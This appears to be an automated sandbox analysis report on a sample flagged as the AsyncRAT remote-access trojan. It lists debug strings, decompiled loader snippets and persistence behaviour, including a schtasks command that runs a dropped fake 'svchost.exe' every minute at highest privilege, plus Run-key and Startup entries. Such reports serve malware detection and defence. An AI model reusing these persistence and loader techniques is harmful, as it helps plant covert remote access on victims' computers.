                          Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.ni.pdbRSDS source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.PDB source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1712971481.0000022EE42B8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBD0C000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: System.Configuration.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Data.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Data.ni.pdbRSDSC source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.pdb source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBD0C000.00000004.00000800.00020000.00000000.sdmp, WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Data.pdbH source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Numerics.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: b77a5c561934e089stem.pdb source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1712971481.0000022EE42C5000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Core.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Runtime.Serialization.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Numerics.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.pdbP source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdbRSDS source: WER61AC.tmp.dmp.12.dr

                          Data Obfuscation

                          barindex
                          .NET source code contains method to dynamically call methods (often used by packers)
                          Source: not rat.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: not rat.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: svchost.exe.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: svchost.exe.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          .NET source code contains potential unpacker
                          Source: not rat.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: not rat.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                          Source: not rat.exe.0.dr, Messages.cs.Net Code: Memory
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, Messages.cs.Net Code: Memory
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, Messages.cs.Net Code: Memory
                          Source: svchost.exe.2.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: svchost.exe.2.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                          Source: svchost.exe.2.dr, Messages.cs.Net Code: Memory
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F7C2D push E95DCFC9h; ret 2_2_00007FFB4B0F7C79
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F7C7B push E95DCFC9h; ret 2_2_00007FFB4B0F7C79
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F72BC pushad ; ret 2_2_00007FFB4B0F72CA
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F8604 push eax; ret 2_2_00007FFB4B0F867B
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F8648 push eax; ret 2_2_00007FFB4B0F867B
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F0699 push edi; ret 2_2_00007FFB4B0F069A
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F867D push eax; ret 2_2_00007FFB4B0F867B
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeCode function: 3_2_00007FFB4B0F29D0 push ebp; retf 3_2_00007FFB4B0FD748
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeCode function: 3_2_00007FFB4B0E412D push ss; ret 3_2_00007FFB4B0FE037
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeCode function: 3_2_00007FFB4B0FEAA9 push edi; ret 3_2_00007FFB4B0FEAAA
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeCode function: 3_2_00007FFB4B0F8B12 push esi; ret 3_2_00007FFB4B0F8B13
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeCode function: 3_2_00007FFB4B0E00BD pushad ; iretd 3_2_00007FFB4B0E00C1
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeCode function: 3_2_00007FFB4B0E077C pushad ; ret 3_2_00007FFB4B0E078A
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4AFAD2A5 pushad ; iretd 5_2_00007FFB4AFAD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4AFADFE6 push edi; ret 5_2_00007FFB4AFADFE7
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4B0C1075 pushad ; ret 5_2_00007FFB4B0C108A
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4B0C05B9 push edi; ret 5_2_00007FFB4B0C05BA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4B0C0962 push E85DD35Dh; ret 5_2_00007FFB4B0C09F9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4B192316 push 8B485F95h; iretd 5_2_00007FFB4B19231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4B191519 push eax; retf 5_2_00007FFB4B191539
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4AFBDF06 push edi; ret 8_2_00007FFB4AFBDF07
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4AFBD2A5 pushad ; iretd 8_2_00007FFB4AFBD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4B0D0E95 pushad ; ret 8_2_00007FFB4B0D0EAA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4B0D0570 push eax; retf 8_2_00007FFB4B0D05FD
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4B1A2316 push 8B485F94h; iretd 8_2_00007FFB4B1A231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFB4AFDDB66 push edi; ret 17_2_00007FFB4AFDDB67
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFB4AFDD2A5 pushad ; iretd 17_2_00007FFB4AFDD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFB4B0F119D pushad ; ret 17_2_00007FFB4B0F11F2
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFB4B0F0519 push edi; ret 17_2_00007FFB4B0F051A
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFB4B1C2316 push 8B485F92h; iretd 17_2_00007FFB4B1C231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFB4AFED2A5 pushad ; iretd 19_2_00007FFB4AFED2A6
                          Source: sDKRz09zM7.exeStatic PE information: section name: .text entropy: 7.998173784136308

                          Persistence and Installation Behavior

                          barindex
                          Drops PE files with benign system names
                          Source: C:\Users\user\AppData\Roaming\not rat.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeFile created: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeJump to dropped file
                          Source: C:\Users\user\AppData\Roaming\not rat.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeFile created: C:\Users\user\AppData\Roaming\not rat.exeJump to dropped file

                          Boot Survival

                          barindex
                          Yara detected AsyncRAT
                          Source: Yara matchFile source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3059b50.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3064190.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: sDKRz09zM7.exe PID: 7316, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPED
                          Uses schtasks.exe or at.exe to add and modify task schedules
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                          Source: C:\Users\user\AppData\Roaming\not rat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Loading BitLocker PowerShell Module
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
